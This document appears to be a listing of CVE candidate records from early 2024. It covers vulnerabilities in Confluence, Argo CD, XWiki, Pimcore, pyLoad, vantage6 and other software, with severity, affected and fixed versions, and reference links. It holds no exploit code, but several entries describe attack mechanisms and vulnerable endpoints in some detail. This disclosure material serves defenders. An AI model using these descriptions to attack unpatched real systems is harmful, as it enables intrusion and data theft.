CVE    2024    21678    Candidate    This High severity Stored XSS vulnerability was introduced in version 2.7.0 of Confluence Data Center. This Stored XSS vulnerability, with a CVSS Score of 8.5, allows an authenticated attacker to execute arbitrary HTML or JavaScript code on a victim's browser which has high impact to confidentiality, low impact to integrity, no impact to availability, and requires no user interaction. Data Center: Atlassian recommends that Confluence Data Center customers upgrade to the latest version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions: ||Affected versions||Fixed versions|| |from 8.7.0 to 8.7.1|8.8.0 recommended or 8.7.2| |from 8.6.0 to 8.6.1|8.8.0 recommended| |from 8.5.0 to 8.5.4 LTS|8.8.0 recommended or 8.5.5 LTS or 8.5.6 LTS| |from 8.4.0 to 8.4.5|8.8.0 recommended or 8.5.6 LTS| |from 8.3.0 to 8.3.4|8.8.0 recommended or 8.5.6 LTS| |from 8.2.0 to 8.2.3|8.8.0 recommended or 8.5.6 LTS| |from 8.1.0 to 8.1.4|8.8.0 recommended or 8.5.6 LTS| |from 8.0.0 to 8.0.4|8.8.0 recommended or 8.5.6 LTS| |from 7.20.0 to 7.20.3|8.8.0 recommended or 8.5.6 LTS| |from 7.19.0 to 7.19.17 LTS|8.8.0 recommended or 8.5.6 LTS or 7.19.18 LTS or 7.19.19 LTS| |from 7.18.0 to 7.18.3|8.8.0 recommended or 8.5.6 LTS or 7.19.19 LTS| |from 7.17.0 to 7.17.5|8.8.0 recommended or 8.5.6 LTS or 7.19.19 LTS| |Any earlier versions|8.8.0 recommended or 8.5.6 LTS or 7.19.19 LTS| Server: Atlassian recommends that Confluence Server customers upgrade to the latest 8.5.x LTS version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions: ||Affected versions||Fixed versions|| |from 8.5.0 to 8.5.4 LTS|8.5.5 LTS or 8.5.6 LTS recommended | |from 8.4.0 to 8.4.5|8.5.6 LTS recommended| |from 8.3.0 to 8.3.4|8.5.6 LTS recommended| |from 8.2.0 to 8.2.3|8.5.6 LTS recommended| |from 8.1.0 to 8.1.4|8.5.6 LTS recommended| |from 8.0.0 to 8.0.4|8.5.6 LTS recommended| |from 7.20.0 to 7.20.3|8.5.6 LTS recommended| |from 7.19.0 to 7.19.17 LTS|8.5.6 LTS recommended or 7.19.18 LTS or 7.19.19 LTS| |from 7.18.0 to 7.18.3|8.5.6 LTS recommended or 7.19.19 LTS| |from 7.17.0 to 7.17.5|8.5.6 LTS recommended or 7.19.19 LTS| |Any earlier versions|8.5.6 LTS recommended or 7.19.19 LTS| See the release notes ([https://confluence.atlassian.com/doc/confluence-release-notes-327.html]). You can download the latest version of Confluence Data Center from the download center ([https://www.atlassian.com/software/confluence/download-archives]). This vulnerability was reported via our Bug Bounty program.    MISC:https://confluence.atlassian.com/pages/viewpage.action?pageId=1354501606   |   URL:https://confluence.atlassian.com/pages/viewpage.action?pageId=1354501606   |   MISC:https://jira.atlassian.com/browse/CONFSERVER-94513   |   URL:https://jira.atlassian.com/browse/CONFSERVER-94513    Assigned (20240101)
CVE    2024    21677    Candidate    This High severity Path Traversal vulnerability was introduced in version 6.13.0 of Confluence Data Center. This Path Traversal vulnerability, with a CVSS Score of 8.3, allows an unauthenticated attacker to exploit an undefinable vulnerability which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: Data Center Atlassian recommends that Confluence Data Center customers upgrade to the latest version and that Confluence Server customers upgrade to the latest 8.5.x LTS version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions See the release notes https://confluence.atlassian.com/doc/confluence-release-notes-327.html You can download the latest version of Confluence Data Center and Server from the download center https://www.atlassian.com/software/confluence/download-archives. This vulnerability was reported via our Bug Bounty program.    MISC:https://confluence.atlassian.com/pages/viewpage.action?pageId=1369444862   |   URL:https://confluence.atlassian.com/pages/viewpage.action?pageId=1369444862   |   MISC:https://jira.atlassian.com/browse/CONFSERVER-94604   |   URL:https://jira.atlassian.com/browse/CONFSERVER-94604    Assigned (20240101)
CVE    2024    21674    Candidate    This High severity Remote Code Execution (RCE) vulnerability was introduced in version 7.13.0 of Confluence Data Center and Server. Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.6 and a CVSS Vector of CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N allows an unauthenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, no impact to integrity, no impact to availability, and does not require user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: * Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release * Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release * Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher release See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html ). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives ).    MISC:https://jira.atlassian.com/browse/CONFSERVER-94066   |   URL:https://jira.atlassian.com/browse/CONFSERVER-94066    Assigned (20240101)
CVE    2024    21673    Candidate    This High severity Remote Code Execution (RCE) vulnerability was introduced in versions 7.13.0 of Confluence Data Center and Server. Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.0 and a CVSS Vector of CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H allows an authenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, high impact to integrity, high impact to availability, and does not require user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: * Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release * Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release * Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher release See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html ). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives ).    MISC:https://jira.atlassian.com/browse/CONFSERVER-94065   |   URL:https://jira.atlassian.com/browse/CONFSERVER-94065    Assigned (20240101)
CVE    2024    21672    Candidate    This High severity Remote Code Execution (RCE) vulnerability was introduced in version 2.1.0 of Confluence Data Center and Server. Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.3 and a CVSS Vector of CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H allows an unauthenticated attacker to remotely expose assets in your environment susceptible to exploitation which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: * Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release * Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release * Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher release See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html ). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives).    MISC:https://jira.atlassian.com/browse/CONFSERVER-94064   |   URL:https://jira.atlassian.com/browse/CONFSERVER-94064    Assigned (20240101)
CVE    2024    21671    Candidate    The vantage6 technology enables managing and deploying privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). It is possible to find out usernames from the response time of login requests. This could aid attackers in credential attacks. Version 4.2.0 patches this vulnerability.    MISC:https://github.com/vantage6/vantage6/commit/389f416c445da4f2438c72f34c3b1084485c4e30   |   URL:https://github.com/vantage6/vantage6/commit/389f416c445da4f2438c72f34c3b1084485c4e30   |   MISC:https://github.com/vantage6/vantage6/security/advisories/GHSA-45gq-q4xh-cp53   |   URL:https://github.com/vantage6/vantage6/security/advisories/GHSA-45gq-q4xh-cp53    Assigned (20231229)
CVE    2024    21670    Candidate    Ursa is a cryptographic library for use with blockchains. The revocation schema that is part of the Ursa CL-Signatures implementations has a flaw that could impact the privacy guarantees defined by the AnonCreds verifiable credential model, allowing a malicious holder of a revoked credential to generate a valid Non-Revocation Proof for that credential as part of an AnonCreds presentation. A verifier may verify a credential from a holder as being "not revoked" when in fact, the holder's credential has been revoked. Ursa has moved to end-of-life status and no fix is expected.    MISC:https://github.com/hyperledger-archives/ursa/security/advisories/GHSA-r78f-4q2q-hvv4   |   URL:https://github.com/hyperledger-archives/ursa/security/advisories/GHSA-r78f-4q2q-hvv4    Assigned (20231229)
CVE    2024    2167    Candidate    ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-2041. Reason: This candidate is a reservation duplicate of CVE-2024-2041. Notes: All CVE users should reference CVE-2024-2041 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.        Assigned (20240304)
CVE    2024    21669    Candidate    Hyperledger Aries Cloud Agent Python (ACA-Py) is a foundation for building decentralized identity applications and services running in non-mobile environments. When verifying W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs (LDP-VCs), the result of verifying the presentation `document.proof` was not factored into the final `verified` value (`true`/`false`) on the presentation record. The flaw enables holders of W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs (LDPs) to present incorrectly constructed proofs, and allows malicious verifiers to save and replay a presentation from such holders as their own. This vulnerability has been present since version 0.7.0 and fixed in version 0.10.5.    MISC:https://github.com/hyperledger/aries-cloudagent-python/commit/0b01ffffc0789205ac990292f97238614c9fd293   |   URL:https://github.com/hyperledger/aries-cloudagent-python/commit/0b01ffffc0789205ac990292f97238614c9fd293   |   MISC:https://github.com/hyperledger/aries-cloudagent-python/commit/4c45244e2085aeff2f038dd771710e92d7682ff2   |   URL:https://github.com/hyperledger/aries-cloudagent-python/commit/4c45244e2085aeff2f038dd771710e92d7682ff2   |   MISC:https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.10.5   |   URL:https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.10.5   |   MISC:https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.11.0   |   URL:https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.11.0   |   MISC:https://github.com/hyperledger/aries-cloudagent-python/security/advisories/GHSA-97x9-59rv-q5pm   |   URL:https://github.com/hyperledger/aries-cloudagent-python/security/advisories/GHSA-97x9-59rv-q5pm    Assigned (20231229)
CVE    2024    21668    Candidate    react-native-mmkv is a library that allows easy use of MMKV inside React Native applications. Before version 2.11.0, the react-native-mmkv logged the optional encryption key for the MMKV database into the Android system log. The key can be obtained by anyone with access to the Android Debugging Bridge (ADB) if it is enabled in the phone settings. This bug is not present on iOS devices. By logging the encryption secret to the system logs, attackers can trivially recover the secret by enabling ADB and undermining an app's threat model. This issue has been patched in version 2.11.0.    MISC:https://github.com/mrousavy/react-native-mmkv/commit/a8995ccb7184281f7d168bad3e9987c9bd05f00d   |   URL:https://github.com/mrousavy/react-native-mmkv/commit/a8995ccb7184281f7d168bad3e9987c9bd05f00d   |   MISC:https://github.com/mrousavy/react-native-mmkv/releases/tag/v2.11.0   |   URL:https://github.com/mrousavy/react-native-mmkv/releases/tag/v2.11.0   |   MISC:https://github.com/mrousavy/react-native-mmkv/security/advisories/GHSA-4jh3-6jhv-2mgp   |   URL:https://github.com/mrousavy/react-native-mmkv/security/advisories/GHSA-4jh3-6jhv-2mgp    Assigned (20231229)
CVE    2024    21667    Candidate    pimcore/customer-data-framework is the Customer Management Framework for management of customer data within Pimcore. An authenticated and unauthorized user can access the GDPR data extraction feature and query over the information returned, leading to customer data exposure. Permissions are not enforced when reaching the `/admin/customermanagementframework/gdpr-data/search-data-objects` endpoint allowing an authenticated user without the permissions to access the endpoint and query the data available there. An unauthorized user can access PII data from customers. This vulnerability has been patched in version 4.0.6.    MISC:https://github.com/pimcore/customer-data-framework/blob/b4af625ef327c58d05ef7cdf145fa749d2d4195e/src/Controller/Admin/GDPRDataController.php#L38   |   URL:https://github.com/pimcore/customer-data-framework/blob/b4af625ef327c58d05ef7cdf145fa749d2d4195e/src/Controller/Admin/GDPRDataController.php#L38   |   MISC:https://github.com/pimcore/customer-data-framework/commit/6c34515be2ba39dceee7da07a1abf246309ccd77   |   URL:https://github.com/pimcore/customer-data-framework/commit/6c34515be2ba39dceee7da07a1abf246309ccd77   |   MISC:https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-g273-wppx-82w4   |   URL:https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-g273-wppx-82w4    Assigned (20231229)
CVE    2024    21666    Candidate    The Customer Management Framework (CMF) for Pimcore adds functionality for customer data management, segmentation, personalization and marketing automation. An authenticated and unauthorized user can access the list of potential duplicate users and see their data. Permissions are enforced when reaching the `/admin/customermanagementframework/duplicates/list` endpoint allowing an authenticated user without the permissions to access the endpoint and query the data available there. Unauthorized user(s) can access PII data from customers. This vulnerability has been patched in version 4.0.6.    MISC:https://github.com/pimcore/customer-data-framework/blob/b4af625ef327c58d05ef7cdf145fa749d2d4195e/src/Controller/Admin/DuplicatesController.php#L43   |   URL:https://github.com/pimcore/customer-data-framework/blob/b4af625ef327c58d05ef7cdf145fa749d2d4195e/src/Controller/Admin/DuplicatesController.php#L43   |   MISC:https://github.com/pimcore/customer-data-framework/commit/c33c0048390ef0cf98b801d46a81d0762243baa6   |   URL:https://github.com/pimcore/customer-data-framework/commit/c33c0048390ef0cf98b801d46a81d0762243baa6   |   MISC:https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-c38c-c8mh-vq68   |   URL:https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-c38c-c8mh-vq68    Assigned (20231229)
CVE    2024    21665    Candidate    ecommerce-framework-bundle is the Pimcore Ecommerce Framework Bundle. An authenticated and unauthorized user can access the back-office orders list and be able to query over the information returned. Access control and permissions are not being enforced. This vulnerability has been patched in version 1.0.10.    MISC:https://github.com/pimcore/ecommerce-framework-bundle/blob/ff6ff287b6eb468bb940909c56970363596e5c21/src/Controller/AdminOrderController.php#L98   |   URL:https://github.com/pimcore/ecommerce-framework-bundle/blob/ff6ff287b6eb468bb940909c56970363596e5c21/src/Controller/AdminOrderController.php#L98   |   MISC:https://github.com/pimcore/ecommerce-framework-bundle/commit/05dec000ed009828084d05cf686f468afd1f464e   |   URL:https://github.com/pimcore/ecommerce-framework-bundle/commit/05dec000ed009828084d05cf686f468afd1f464e   |   MISC:https://github.com/pimcore/ecommerce-framework-bundle/releases/tag/v1.0.10   |   URL:https://github.com/pimcore/ecommerce-framework-bundle/releases/tag/v1.0.10   |   MISC:https://github.com/pimcore/ecommerce-framework-bundle/security/advisories/GHSA-cx99-25hr-5jxf   |   URL:https://github.com/pimcore/ecommerce-framework-bundle/security/advisories/GHSA-cx99-25hr-5jxf    Assigned (20231229)
CVE    2024    21664    Candidate    jwx is a Go module implementing various JWx (JWA/JWE/JWK/JWS/JWT, otherwise known as JOSE) technologies. Calling `jws.Parse` with a JSON serialized payload where the `signature` field is present while `protected` is absent can lead to a nil pointer dereference. The vulnerability can be used to crash/DOS a system doing JWS verification. This vulnerability has been patched in versions 2.0.19 and 1.2.28.    MISC:https://github.com/lestrrat-go/jwx/commit/0e8802ce6842625845d651456493e7c87625601f   |   URL:https://github.com/lestrrat-go/jwx/commit/0e8802ce6842625845d651456493e7c87625601f   |   MISC:https://github.com/lestrrat-go/jwx/commit/8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65   |   URL:https://github.com/lestrrat-go/jwx/commit/8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65   |   MISC:https://github.com/lestrrat-go/jwx/commit/d69a721931a5c48b9850a42404f18e143704adcd   |   URL:https://github.com/lestrrat-go/jwx/commit/d69a721931a5c48b9850a42404f18e143704adcd   |   MISC:https://github.com/lestrrat-go/jwx/security/advisories/GHSA-pvcr-v8j8-j5q3   |   URL:https://github.com/lestrrat-go/jwx/security/advisories/GHSA-pvcr-v8j8-j5q3    Assigned (20231229)
CVE    2024    21663    Candidate    Discord-Recon is a Discord bot created to automate bug bounty recon, automated scans and information gathering via a discord server. Discord-Recon is vulnerable to remote code execution. An attacker is able to execute shell commands in the server without having an admin role. This vulnerability has been fixed in version 0.0.8.    MISC:https://github.com/DEMON1A/Discord-Recon/commit/f9cb0f67177f5e2f1022295ca8e641e47837ec7a   |   URL:https://github.com/DEMON1A/Discord-Recon/commit/f9cb0f67177f5e2f1022295ca8e641e47837ec7a   |   MISC:https://github.com/DEMON1A/Discord-Recon/issues/23   |   URL:https://github.com/DEMON1A/Discord-Recon/issues/23   |   MISC:https://github.com/DEMON1A/Discord-Recon/security/advisories/GHSA-fjcj-g7x8-4rp7   |   URL:https://github.com/DEMON1A/Discord-Recon/security/advisories/GHSA-fjcj-g7x8-4rp7    Assigned (20231229)
CVE    2024    21662    Candidate    Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Prior to versions 2.8.13, 2.9.9, and 2.10.4, an attacker can effectively bypass the rate limit and brute force protections by exploiting the application's weak cache-based mechanism. This loophole in security can be combined with other vulnerabilities to attack the default admin account. This flaw undermines a patch for CVE-2020-8827 intended to protect against brute-force attacks. The application's brute force protection relies on a cache mechanism that tracks login attempts for each user. This cache is limited to a `defaultMaxCacheSize` of 1000 entries. An attacker can overflow this cache by bombarding it with login attempts for different users, thereby pushing out the admin account's failed attempts and effectively resetting the rate limit for that account. This is a severe vulnerability that enables attackers to perform brute force attacks at an accelerated rate, especially targeting the default admin account. Users should upgrade to version 2.8.13, 2.9.9, or 2.10.4 to receive a patch.    MISC:https://argo-cd.readthedocs.io/en/stable/security_considerations/#cve-2020-8827-insufficient-anti-automationanti-brute-force   |   URL:https://argo-cd.readthedocs.io/en/stable/security_considerations/#cve-2020-8827-insufficient-anti-automationanti-brute-force   |   MISC:https://github.com/argoproj/argo-cd/commit/17b0df1168a4c535f6f37e95f25ed7cd81e1fa4d   |   URL:https://github.com/argoproj/argo-cd/commit/17b0df1168a4c535f6f37e95f25ed7cd81e1fa4d   |   MISC:https://github.com/argoproj/argo-cd/commit/6e181d72b31522f886a2afa029d5b26d7912ec7b   |   URL:https://github.com/argoproj/argo-cd/commit/6e181d72b31522f886a2afa029d5b26d7912ec7b   |   MISC:https://github.com/argoproj/argo-cd/commit/cebb6538f7944c87ca2fecb5d17f8baacc431456   |   URL:https://github.com/argoproj/argo-cd/commit/cebb6538f7944c87ca2fecb5d17f8baacc431456   |   MISC:https://github.com/argoproj/argo-cd/security/advisories/GHSA-2vgg-9h6w-m454   |   URL:https://github.com/argoproj/argo-cd/security/advisories/GHSA-2vgg-9h6w-m454    Assigned (20231229)
CVE    2024    21661    Candidate    Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Prior to versions 2.8.13, 2.9.9, and 2.10.4, an attacker can exploit a critical flaw in the application to initiate a Denial of Service (DoS) attack, rendering the application inoperable and affecting all users. The issue arises from unsafe manipulation of an array in a multi-threaded environment. The vulnerability is rooted in the application's code, where an array is being modified while it is being iterated over. This is a classic programming error but becomes critically unsafe when executed in a multi-threaded environment. When two threads interact with the same array simultaneously, the application crashes. This is a Denial of Service (DoS) vulnerability. Any attacker can crash the application continuously, making it impossible for legitimate users to access the service. The issue is exacerbated because it does not require authentication, widening the pool of potential attackers. Versions 2.8.13, 2.9.9, and 2.10.4 contain a patch for this issue.    MISC:https://github.com/argoproj/argo-cd/blob/54601c8fd30b86a4c4b7eb449956264372c8bde0/util/session/sessionmanager.go#L302-L311   |   URL:https://github.com/argoproj/argo-cd/blob/54601c8fd30b86a4c4b7eb449956264372c8bde0/util/session/sessionmanager.go#L302-L311   |   MISC:https://github.com/argoproj/argo-cd/commit/2a22e19e06aaf6a1e734443043310a66c234e345   |   URL:https://github.com/argoproj/argo-cd/commit/2a22e19e06aaf6a1e734443043310a66c234e345   |   MISC:https://github.com/argoproj/argo-cd/commit/5bbb51ab423f273dda74ab956469843d2db2e208   |   URL:https://github.com/argoproj/argo-cd/commit/5bbb51ab423f273dda74ab956469843d2db2e208   |   MISC:https://github.com/argoproj/argo-cd/commit/ce04dc5c6f6e92033221ec6d96b74403b065ca8b   |   URL:https://github.com/argoproj/argo-cd/commit/ce04dc5c6f6e92033221ec6d96b74403b065ca8b   |   MISC:https://github.com/argoproj/argo-cd/security/advisories/GHSA-6v85-wr92-q4p7   |   URL:https://github.com/argoproj/argo-cd/security/advisories/GHSA-6v85-wr92-q4p7    Assigned (20231229)
CVE    2024    21655    Candidate    Discourse is a platform for community discussion. For fields that are client editable, limits on sizes are not imposed. This allows a malicious actor to cause a Discourse instance to use excessive disk space and also often excessive bandwidth. The issue is patched in 3.1.4 and 3.2.0.beta4.    MISC:https://github.com/discourse/discourse/security/advisories/GHSA-m5fc-94mm-38fx   |   URL:https://github.com/discourse/discourse/security/advisories/GHSA-m5fc-94mm-38fx    Assigned (20231229)
CVE    2024    21654    Candidate    Rubygems.org is the Ruby community's gem hosting service. Rubygems.org users with MFA enabled would normally be protected from account takeover in the case of email account takeover. However, a workaround on the forgotten password form allows an attacker to bypass the MFA requirement and take over the account. This vulnerability has been patched in commit 0b3272a.    MISC:https://github.com/rubygems/rubygems.org/commit/0b3272ac17b45748ee0d1867c49867c7deb26565   |   URL:https://github.com/rubygems/rubygems.org/commit/0b3272ac17b45748ee0d1867c49867c7deb26565   |   MISC:https://github.com/rubygems/rubygems.org/security/advisories/GHSA-4v23-vj8h-7jp2   |   URL:https://github.com/rubygems/rubygems.org/security/advisories/GHSA-4v23-vj8h-7jp2    Assigned (20231229)
CVE    2024    21653    Candidate    The vantage6 technology enables managing and deploying privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). Nodes and servers get an SSH config by default that permits root login with password authentication. In a proper deployment, the SSH service is not exposed so there is no risk, but not all deployments are ideal. The default should therefore be less permissive. The vulnerability can be mitigated by removing the ssh part from the docker file and rebuilding the docker image. Version 4.2.0 patches the vulnerability.    MISC:https://github.com/vantage6/vantage6/commit/3fcc6e6a8bd1142fd7a558d8fdd2b246e55c8841   |   URL:https://github.com/vantage6/vantage6/commit/3fcc6e6a8bd1142fd7a558d8fdd2b246e55c8841   |   MISC:https://github.com/vantage6/vantage6/security/advisories/GHSA-2wgc-48g2-cj5w   |   URL:https://github.com/vantage6/vantage6/security/advisories/GHSA-2wgc-48g2-cj5w    Assigned (20231229)
CVE    2024    21652    Candidate    Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Prior to versions 2.8.13, 2.9.9, and 2.10.4, an attacker can exploit a chain of vulnerabilities, including a Denial of Service (DoS) flaw and in-memory data storage weakness, to effectively bypass the application's brute force login protection. This is a critical security vulnerability that allows attackers to bypass the brute force login protection mechanism. Not only can they crash the service affecting all users, but they can also make unlimited login attempts, increasing the risk of account compromise. Versions 2.8.13, 2.9.9, and 2.10.4 contain a patch for this issue.    MISC:https://github.com/argoproj/argo-cd/security/advisories/GHSA-x32m-mvfj-52xv   |   URL:https://github.com/argoproj/argo-cd/security/advisories/GHSA-x32m-mvfj-52xv    Assigned (20231229)
CVE    2024    21651    Candidate    XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. A user able to attach a file to a page can post a malformed TAR file by manipulating file modification times headers, which when parsed by Tika, could cause a denial of service issue via CPU consumption. This vulnerability has been patched in XWiki 14.10.18, 15.5.3 and 15.8 RC1.    MISC:https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-8959-rfxh-r4j4   |   URL:https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-8959-rfxh-r4j4   |   MISC:https://jira.xwiki.org/browse/XCOMMONS-2796   |   URL:https://jira.xwiki.org/browse/XCOMMONS-2796    Assigned (20231229)
CVE    2024    21650    Candidate    XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. XWiki is vulnerable to a remote code execution (RCE) attack through its user registration feature. This issue allows an attacker to execute arbitrary code by crafting malicious payloads in the "first name" or "last name" fields during user registration. This impacts all installations that have user registration enabled for guests. This vulnerability has been patched in XWiki 14.10.17, 15.5.3 and 15.8 RC1.    MISC:https://github.com/xwiki/xwiki-platform/commit/b290bfd573c6f7db6cc15a88dd4111d9fcad0d31   |   URL:https://github.com/xwiki/xwiki-platform/commit/b290bfd573c6f7db6cc15a88dd4111d9fcad0d31   |   MISC:https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rj7p-xjv7-7229   |   URL:https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rj7p-xjv7-7229   |   MISC:https://jira.xwiki.org/browse/XWIKI-21173   |   URL:https://jira.xwiki.org/browse/XWIKI-21173    Assigned (20231229)
CVE    2024    21649    Candidate    The vantage6 technology enables managing and deploying privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). Prior to 4.2.0, authenticated users could inject code into algorithm environment variables, resulting in remote code execution. This vulnerability is patched in 4.2.0.    MISC:https://github.com/vantage6/vantage6/commit/eac19db737145d3ca987adf037a454fae0790ddd   |   URL:https://github.com/vantage6/vantage6/commit/eac19db737145d3ca987adf037a454fae0790ddd   |   MISC:https://github.com/vantage6/vantage6/security/advisories/GHSA-w9h2-px87-74vx   |   URL:https://github.com/vantage6/vantage6/security/advisories/GHSA-w9h2-px87-74vx    Assigned (20231229)
CVE    2024    21648    Candidate    XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. The rollback action is missing a right protection, a user can rollback to a previous version of the page to gain rights they don't have anymore. The problem has been patched in XWiki 14.10.17, 15.5.3 and 15.8-rc-1 by ensuring that the rights are checked before performing the rollback.    MISC:https://github.com/xwiki/xwiki-platform/commit/4de72875ca49602796165412741033bfdbf1e680   |   URL:https://github.com/xwiki/xwiki-platform/commit/4de72875ca49602796165412741033bfdbf1e680   |   MISC:https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-xh35-w7wg-95v3   |   URL:https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-xh35-w7wg-95v3   |   MISC:https://jira.xwiki.org/browse/XWIKI-21257   |   URL:https://jira.xwiki.org/browse/XWIKI-21257    Assigned (20231229)
CVE    2024    21647    Candidate    Puma is a web server for Ruby/Rack applications built for parallelism. Prior to version 6.4.2, puma exhibited incorrect behavior when parsing chunked transfer encoding bodies in a way that allowed HTTP request smuggling. Fixed versions limit the size of chunk extensions. Without this limit, an attacker could cause unbounded resource (CPU, network bandwidth) consumption. This vulnerability has been fixed in versions 6.4.2 and 5.6.8.    MISC:https://github.com/puma/puma/commit/5fc43d73b6ff193325e657a24ed76dec79133e93   |   URL:https://github.com/puma/puma/commit/5fc43d73b6ff193325e657a24ed76dec79133e93   |   MISC:https://github.com/puma/puma/security/advisories/GHSA-c2f4-cvqm-65w2   |   URL:https://github.com/puma/puma/security/advisories/GHSA-c2f4-cvqm-65w2    Assigned (20231229)
CVE    2024    21646    Candidate    Azure uAMQP is a general purpose C library for AMQP 1.0. The UAMQP library is used by several clients to implement AMQP protocol communication. When clients using this library receive crafted binary type data, an integer overflow or wraparound or memory safety issue can occur and may cause remote code execution. This vulnerability has been patched in release 2024-01-01.    MISC:https://github.com/Azure/azure-uamqp-c/commit/12ddb3a31a5a97f55b06fa5d74c59a1d84ad78fe   |   URL:https://github.com/Azure/azure-uamqp-c/commit/12ddb3a31a5a97f55b06fa5d74c59a1d84ad78fe   |   MISC:https://github.com/Azure/azure-uamqp-c/security/advisories/GHSA-j29m-p99g-7hpv   |   URL:https://github.com/Azure/azure-uamqp-c/security/advisories/GHSA-j29m-p99g-7hpv    Assigned (20231229)
CVE    2024    21645    Candidate    pyLoad is the free and open-source Download Manager written in pure Python. A log injection vulnerability was identified in `pyload` allowing any unauthenticated actor to inject arbitrary messages into the logs gathered by `pyload`. Forged or otherwise corrupted log files can be used to cover an attacker’s tracks or even to implicate another party in the commission of a malicious act. This vulnerability has been patched in version 0.5.0b3.dev77.    MISC:https://github.com/pyload/pyload/commit/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d   |   URL:https://github.com/pyload/pyload/commit/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d   |   MISC:https://github.com/pyload/pyload/security/advisories/GHSA-ghmw-rwh8-6qmr   |   URL:https://github.com/pyload/pyload/security/advisories/GHSA-ghmw-rwh8-6qmr    Assigned (20231229)
CVE    2024    21644    Candidate    pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.    MISC:https://github.com/pyload/pyload/commit/bb22063a875ffeca357aaf6e2edcd09705688c40   |   URL:https://github.com/pyload/pyload/commit/bb22063a875ffeca357aaf6e2edcd09705688c40   |   MISC:https://github.com/pyload/pyload/security/advisories/GHSA-mqpq-2p68-46fv   |   URL:https://github.com/pyload/pyload/security/advisories/GHSA-mqpq-2p68-46fv    Assigned (20231229)
